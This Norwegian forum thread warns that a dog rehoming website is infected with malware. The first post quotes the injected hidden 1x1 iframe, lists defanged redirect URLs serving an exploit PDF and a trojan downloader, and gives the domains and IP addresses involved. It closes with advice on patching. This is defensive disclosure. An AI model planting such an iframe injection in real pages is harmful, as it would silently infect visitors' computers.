Gå til innhold

Hunder til besvær


Anbefalte innlegg

Selv for en dyrevenn så er ikke alt som lukter hund, bra. Nettstedet 'hxxp://www.omplasseringavhunder.no' er fortiden infisert med malware som prøver å utnytte kjente sårbarheter knyttet til div. program.

 

Javascript-injeksjonen, som er lagt inn på siden, henter info fra:

<iframe id="1e321863e201f914ad22f7669a83199d" name="d9660710064c187e1f82343133ab4fe1" width=1

height=1 frameborder=0 src="hxxp://thehugetitstop.cn/dontstop.html"></iframe>

 

Via redirect :

hxxp://vpsspeedin.ru/x/pdf.php -> henter en infisert .pdf-fil (adobe reader)

hxxp://vpsspeedin.ru/x/load.php?id=x -> henter en TrojanDownloader, XPpoliceAntivirus

 

Domener involvert:

thehugetitstop.cn 91.212.65.33

gianthighestfind.cn 91.212.65.33

tozxiqud.cn 91.212.65.7

vpsspeedin.ru 91.212.65.33

ralcofic.cn 91.212.65.7

8addition.info 210.48.154.132

 

I tillegg er det tegn på at pc'n vil bli forsøkt inkl. i et botnet knyttet til epost-spam.

 

Infeksjonen er vanlig og prøver å utnytte kjente sårbarheter knyttet til

Flash Player

Adobe Reader

Office Snapshot Viewer

 

Tiltak er å holde programmene (inkl antivirus) oppdatert. Benytt gjerne F-secure sin Health Check

Endret av norbat
Lenke til kommentar
Videoannonse
Annonse

Takk for tipset.

 

Det er intet nytt at denne type organisasjoner og domene navn vil bli utnyttet. Da dette som oftest er det man minst sammenligner med virus og malware.

 

Min BitDefender stopper heldigvis et hver forsøk. Oppdaterte FireFox til versjon 3.0.7. i dag også.

Endret av roberteh
Lenke til kommentar

Opprett en konto eller logg inn for å kommentere

Du må være et medlem for å kunne skrive en kommentar

Opprett konto

Det er enkelt å melde seg inn for å starte en ny konto!

Start en konto

Logg inn

Har du allerede en konto? Logg inn her.

Logg inn nå
×
×
  • Opprett ny...